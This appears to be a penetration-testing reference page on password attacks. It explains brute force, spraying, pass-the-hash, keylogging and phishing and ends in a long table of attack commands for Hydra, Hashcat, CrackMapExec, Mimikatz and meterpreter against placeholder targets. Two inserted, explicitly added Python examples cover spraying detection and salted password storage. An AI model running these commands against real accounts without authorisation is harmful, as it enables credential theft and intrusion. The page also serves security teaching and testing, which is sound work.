hexdefender

Password Attacks


Last updated 7 months ago


1. Introduction to Password Attacks

Password attacks aim to uncover valid credentials by exploiting weaknesses in password management, storage, or selection. Effective password attacks often rely on weak passwords, poor encryption practices, or unpatched systems.

2. Common Types of Password Attacks

a. Brute Force Attack

  • Description: Attempts every possible combination of characters to guess the password.

  • Tools: Hydra, John the Ripper, Hashcat.

  • Pros & Cons: Effective for shorter passwords but time-consuming for complex ones.

  • Command Example:

    hydra -l user -P /path/to/wordlist.txt <target_IP> ssh

b. Dictionary Attack

  • Description: Uses a predefined list of likely passwords to attempt matches.

  • Tools: Hashcat, Medusa, John the Ripper.

  • Pros & Cons: Faster than brute force but limited by the quality of the dictionary.

  • Resources for Wordlists:

c. Hybrid Attack

  • Description: Combines dictionary words with character variations, like appending numbers or symbols.

  • Tools: Hashcat with hybrid mode, John the Ripper.

  • Pros & Cons: Targets passwords that follow predictable patterns effectively.

  • Command Example:

    hashcat -a 6 -m <hash_type> <hash_file> /path/to/wordlist.txt

d. Rainbow Table Attack

  • Description: Uses precomputed tables of hashed passwords to quickly find matches.

  • Tools: Rainbow Crack, Ophcrack.

  • Pros & Cons: Very fast if the table matches the hashing algorithm but requires significant storage.

  • Rainbow Table Resources:

e. Credential Stuffing

  • Description: Reuses breached username-password pairs across multiple accounts.

  • Tools: Sentry MBA, Snipr, OpenBullet.

  • Pros & Cons: Effective against users who reuse passwords but limited by the availability of breached data.

  • Resources for Credential Dumps:

f. Password Spraying

  • Description: Attempts a few common passwords across many accounts to avoid account lockouts.

  • Tools: CrackMapExec, Ruler, Spraying Toolkit.

  • Pros & Cons: Effective against organizations with weak password policies but can be detected by activity monitoring.
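The brute-force and spraying patterns described above leave different traces in authentication logs, which is what activity monitoring keys on. The following is an added example, not part of the original page: it classifies source addresses from sshd failure lines. The log lines, addresses, usernames and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")

def _fail(user, ip, n, invalid=False):
    # Build one constructed sshd failure line (not captured from a real host).
    who = f"invalid user {user}" if invalid else user
    return (f"Jan 10 09:00:{n:02d} host sshd[{100 + n}]: "
            f"Failed password for {who} from {ip} port {40000 + n} ssh2")

# Constructed sample: documentation IP ranges, invented usernames.
SAMPLE_LOG = "\n".join(
    [_fail("root", "198.51.100.7", n) for n in range(6)]
    + [_fail(u, "203.0.113.9", 10 + i, invalid=(u == "erin"))
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin"])]
    + [_fail("alice", "192.0.2.20", 20),
       "Jan 10 09:00:21 host sshd[121]: Accepted password for alice "
       "from 192.0.2.20 port 40021 ssh2"]
)

def failures_by_source(log_text):
    """Map source IP -> {username: failed-login count}."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            counts[ip][user] += 1
    return counts

def classify_sources(log_text, brute_min=5, spray_min_users=4, spray_max_each=2):
    """Label sources whose failure pattern looks like brute force or spraying.

    Thresholds are illustrative assumptions; tune them per environment and
    apply them per time window in production.
    """
    findings = {}
    for ip, per_user in failures_by_source(log_text).items():
        worst = max(per_user.values())
        if worst >= brute_min:
            findings[ip] = "brute-force"      # many guesses at one account
        elif len(per_user) >= spray_min_users and worst <= spray_max_each:
            findings[ip] = "spraying"         # few guesses at many accounts
    return findings

def max_failures_per_account(log_text, ip):
    """What a per-account lockout counter would see from this source."""
    return max(failures_by_source(log_text)[ip].values())
```

The spraying source never exceeds one failure per account, so a per-account lockout counter alone does not flag it; counting distinct accounts per source does.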


3. Popular Password Hacking Tools

a. John the Ripper

  • Description: One of the most popular open-source password cracking tools.

  • Capabilities: Supports many hashing algorithms, custom rules, and has a wide range of cracking modes.

b. Hashcat

  • Description: A high-performance password cracker optimized for GPU processing.

  • Capabilities: Supports multiple attack modes and advanced rules.

c. Hydra

  • Description: A fast network login cracker for numerous protocols (SSH, FTP, HTTP, etc.).

  • Capabilities: Brute-forcing and dictionary attacks across various protocols.

d. Medusa

  • Description: A versatile brute-forcing tool that supports many protocols.

  • Capabilities: Known for its speed and flexibility.

e. CrackMapExec

  • Description: A Swiss Army knife for pentesters that supports spraying, brute-forcing, and exploitation.

  • Capabilities: Integrated with Metasploit for extensive password attacks on Windows.

f. Ophcrack

  • Description: Uses rainbow tables for cracking Windows LM and NTLM hashes.

  • Capabilities: Specialized in Windows passwords.


4. Specialized Password Attack Techniques

a. Man-in-the-Middle (MitM) Attacks

  • Description: Intercepts passwords as they travel over the network.

  • Tools: Ettercap, MITMf, Bettercap.

b. Pass-the-Hash

  • Description: Uses hashed passwords to authenticate without cracking them.

  • Tools: Mimikatz, Pass-the-Hash Toolkit.

c. Keylogging and Malware

  • Description: Captures keystrokes to retrieve passwords directly from user input.

  • Tools: Metasploit (keylogger payloads), Cobalt Strike.

  • Pros & Cons: Effective, but requires malware delivery and installation.

d. Phishing and Social Engineering

  • Description: Tricking users into revealing their passwords via fake login pages or deceptive requests.

  • Tools: Gophish, SET (Social Engineering Toolkit).


5. Hash Cracking Techniques and Tools

a. NTLM and LM Hash Cracking

  • Tools: Cain and Abel, Ophcrack.

  • Command Example:

    john --format=NT hashfile

b. SHA-1 and SHA-256 Cracking

  • Tools: Hashcat, John the Ripper.

  • Command Example:

    hashcat -m 100 hashfile /path/to/wordlist.txt

c. PBKDF2 and bcrypt Cracking

  • Tools: Hashcat, JtR.
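Why the hash types in this section matter to whoever stores the passwords, as an added example that is not part of the original page: an unsalted SHA-1 digest can be found in a precomputed lookup table (the simplest form of the idea behind a rainbow table), while a salted PBKDF2 record cannot. The wordlist, record format and iteration count are assumptions chosen for the illustration.

```python
import hashlib
import hmac
import os

WORDLIST = ["password", "letmein", "Summer2024", "qwerty"]  # constructed sample

# Precomputed table: unsalted SHA-1 digest -> plaintext.
PRECOMPUTED = {hashlib.sha1(w.encode()).hexdigest(): w for w in WORDLIST}

def store_unsalted(password):
    """Weak storage: the same password always yields the same digest."""
    return hashlib.sha1(password.encode()).hexdigest()

def store_pbkdf2(password, iterations=600_000):
    """Salted, iterated storage; record format is an assumption of this example."""
    salt = os.urandom(16)  # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_pbkdf2(password, record):
    """Recompute with the stored salt and compare in constant time."""
    _, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

def lookup(stored):
    """Return the plaintext if the stored digest is in the precomputed table."""
    digest = stored.rsplit("$", 1)[-1]
    return PRECOMPUTED.get(digest)
```

Because each record carries its own salt, two users with the same password get different records, and a table would have to be rebuilt per salt.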


6. Guides and Resources for Further Learning


Conclusion

This extensive look at password attacks illustrates the variety of tools and techniques available to an attacker and how each method can be mitigated with strong security practices. In practice, penetration testers should select methods based on target context, password strength, and network defenses. As password attacks continue to evolve, regularly reviewing and updating this knowledge with new tools and methods will ensure a strong foundation in penetration testing and cybersecurity.

Below is a comprehensive table of common password attack vectors, primary tools used for each, and example usages. This will provide an extensive reference list for various attack techniques, covering both standard and specialized tools.

| Attack Vector | Primary Tool | Example Usage |
|---|---|---|
| Brute Force | Hydra | hydra -l user -P /path/to/wordlist.txt <target_IP> ssh |
| Dictionary Attack | John the Ripper | john --wordlist=/path/to/wordlist.txt hashfile |
| Hybrid Attack | Hashcat | hashcat -a 6 -m 1000 hashfile /path/to/wordlist.txt |
| Rainbow Table Attack | Ophcrack | ophcrack -t rainbow-table-file hashfile |
| Credential Stuffing | Snipr | Uses breach lists for multi-account testing |
| Password Spraying | CrackMapExec | crackmapexec smb <target_IP> -u users.txt -p common-passwords.txt |
| Keylogging Attack | Metasploit | meterpreter > keyscan_start |
| Phishing | Gophish | Set up phishing campaign targeting email credentials |
| Pass-the-Hash | Mimikatz | sekurlsa::pth /user:Admin /domain:domain /ntlm:<NTLM_HASH> /run:powershell.exe |
| Hash Cracking (NTLM) | Hashcat | hashcat -m 1000 hashfile /path/to/wordlist.txt |
| Hash Cracking (bcrypt) | John the Ripper | john --format=bcrypt hashfile |
| LM Hash Cracking | Cain and Abel | Load hashes and run automated cracking |
| SSH Brute Force | Hydra | hydra -l root -P passwords.txt ssh://<target_IP> |
| HTTP Basic Auth Brute Force | Medusa | medusa -h <target_IP> -U users.txt -P passwords.txt -M http |
| FTP Brute Force | Hydra | hydra -l anonymous -P passwords.txt ftp://<target_IP> |
| SMB Password Attack | CrackMapExec | crackmapexec smb <target_IP> -u admin -p passwords.txt |
| SQL Database Password Cracking | SQLMap | sqlmap -u <URL> --crack --passwords |
| WPA2 Wi-Fi Cracking | aircrack-ng | aircrack-ng -w /path/to/wordlist.txt <capture-file> |
| Email Phishing with Spoofed Links | SET (Social-Engineer Toolkit) | Phishing module setup targeting email collection |
| Reverse Brute Force | Hydra | hydra -L usernames.txt -p commonpassword <target_IP> ssh |
| Multi-Protocol Password Testing | Medusa | Supports SMB, HTTP, FTP, Telnet, etc. |
| Telnet Brute Force | Hydra | hydra -l root -P passwords.txt telnet://<target_IP> |
| RDP Brute Force | Hydra | hydra -l Administrator -P passwords.txt rdp://<target_IP> |
| Cisco Router Cracking | Ncrack | ncrack -p 23 --user root --pass passwords.txt <target_IP> |
| DNS Zone Transfer Attempt | nslookup | nslookup -type=any -query=AXFR <target_domain> |
| LDAP Password Attack | Medusa | medusa -h <target_IP> -u user -P passwords.txt -M ldap |
| Telnet Credential Guessing | Hydra | hydra -l admin -P passwords.txt telnet://<target_IP> |
| SNMP Community String Brute Force | Onesixtyone | onesixtyone -c community-strings.txt <target_IP> |
| OpenVPN Brute Force | Hydra | hydra -l user -P passwords.txt openvpn://<target_IP> |
| Apache Tomcat Manager Brute Force | Hydra | hydra -l admin -P passwords.txt http-get://<target_IP>:8080/manager/html |
| XMPP Brute Force | Hydra | hydra -l user -P passwords.txt xmpp://<target_IP> |
| SIP/VoIP Credential Guessing | Svmap | Scans for SIP servers and attempts weak password logins |
| Oracle DB Password Attack | ODAT | odat passwordguesser -s <target_IP> -U usernames.txt -P passwords.txt |
| MSSQL Password Cracking | Hydra | hydra -l sa -P passwords.txt mssql://<target_IP> |
| Kerberos TGT Brute Forcing | Kerbrute | kerbrute bruteuser -d domain.com users.txt |
| RADIUS Brute Force | Medusa | medusa -h <target_IP> -u user -P passwords.txt -M radius |
| MongoDB Password Attack | Hydra | hydra -l user -P passwords.txt mongodb://<target_IP> |
| Redis Unauthorized Access Check | Nmap | nmap -p 6379 --script redis-brute <target_IP> |
| MacOS Keychain Exploit | Metasploit | Post-exploitation module in meterpreter for keychain access |
| VNC Password Brute Force | Hydra | hydra -P passwords.txt vnc://<target_IP> |
| VoIP/SIP Password Cracking | Hydra | hydra -L users.txt -P passwords.txt sip://<target_IP> |
| Bitcoin Wallet Brute Force | btcrecover | Uses known wallet details to attempt password recovery |
| Azure AD Password Spraying | MSOLSpray | python3 MSOLSpray.py -u users.txt -p Password123 |
| Office365 Credential Testing | AADInternals | Uses PowerShell to enumerate and test credentials |
| ZIP File Password Cracking | fcrackzip | fcrackzip -u -D -p /path/to/wordlist.txt <file.zip> |
| PDF Password Cracking | pdfcrack | pdfcrack -f <file.pdf> -w /path/to/wordlist.txt |
| RAR File Password Cracking | RarCrack | rarcrack <file.rar> --type rar --dictionary /path/to/wordlist.txt |
| Network Share Password Cracking | CrackMapExec | crackmapexec smb <target_IP> -u usernames.txt -p passwords.txt |


This table should give a thorough understanding of various password attack vectors, tools, and sample commands to use. For each method, there are nuances to configurations and optimizations, so consulting tool-specific documentation and adjusting commands to your target environment can maximize effectiveness.


Resources:

  • SecLists on GitHub
  • Weakpass
  • Project RainbowCrack
  • CrackStation
  • Have I Been Pwned
  • Dehashed
  • John the Ripper Documentation
  • Hashcat Wiki
  • Hydra GitHub Repository
  • Medusa Documentation
  • CrackMapExec GitHub
  • Ophcrack Official Site
  • Bettercap Documentation
  • Mimikatz GitHub
  • Gophish GitHub
  • Hashcat Hash Modes

  • General Password Attack Guide: OWASP Password Attack Cheat Sheet
  • Understanding Hash Functions: NIST Guide to Cryptographic Hashes
  • Advanced Cracking Techniques: Hashcat Advanced Cracking Techniques